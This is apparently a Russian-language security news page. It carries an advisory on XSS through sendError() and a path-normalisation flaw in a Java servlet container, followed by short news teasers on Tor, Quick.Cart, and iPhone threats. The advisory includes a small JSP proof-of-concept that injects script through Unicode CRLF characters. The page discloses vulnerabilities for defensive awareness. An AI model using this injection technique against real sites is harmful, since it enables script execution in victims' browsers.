Уязвимость позволяет удаленному пользователю обойти ограничения безопасности
и выполнить XSS нападение на целевую систему.
1) Уязвимость существует из-за недостаточной обработки входных данных,
передаваемых в функцию "HttpServletResponse.sendError()" перед возвращением
пользователю в HTTP "Reason-Phrase". Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<%@page contentType="text/html"%>
<%
~ // some unicode characters, that result in CRLF being printed
~ final String CRLF = "\u010D\u010A";
~ final String payload = CRLF + CRLF + "<script
type=text/javascript>document.write(Hi, there!)</script><div
style=display:none>";
~ final String message = "Authorization is required to access " + payload;
~ response.sendError(403, message);
%>
2) Уязвимость существует из-за того, что приложение нормализует целевой путь
до удаления строки запроса, когда используется "RequestDispatcher". Атакующий
может получить доступ к запрещенным файлам на целевой системе.
Системы безопасности связи 05-08-2008 Пассивная атака на сеть Tor: вычисление любого пользователя за 20 минут 22-09-2008 Системы безопасности связи Профессор Angelos Keromytis вместе со своим коллегой Sambuddho Chakravarty из отделения компьютерных наук Колумбийского Университета представят новый способ атаки на сеть Tor. Их доклад "Simulating a Global Passive Adversary for Attacking Tor-like Anonymity Systems" был представлен 30 мая на конференции Secu...
Межсайтовый скриптинг в Quick.Cart 19-09-2008 Системы безопасности связи Программа: Quick.Cart 3.xУязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием admin.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Игра для iPhone заражает Windows 18-09-2008 Системы безопасности связи По данным экспертов компании Sophos, киберпреступники выпустили поддельную версию игры Penguin Panic для iPhone, содержащую интегрированный вредоносный код.Этот троян выдает себя за Penguin Panic, игру, где этим небольшим птицам приходится перепрыгивать с айсберга на айсберг. Игра появилась за несколько месяцев до официального открытия Apple iPhone App Store, и в нее начали играть на "разлоченных" телефонах. На данный момент...
Множественные уязвимости в Apple iPhone 16-09-2008 Системы безопасности связи Программа: Apple iPhoneНайденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, осуществить спуфинг атаку и выполнить произвольный код на целевой системе.1) Уязвимость возникает из-за того, что виртуальная среда sandbox не правильно разграничивает доступ между приложениями. Атакующий из одного приложения может прочитать файлы другого приложения.2) Уязвимость возникает из-за множественных ошибок в Fre...
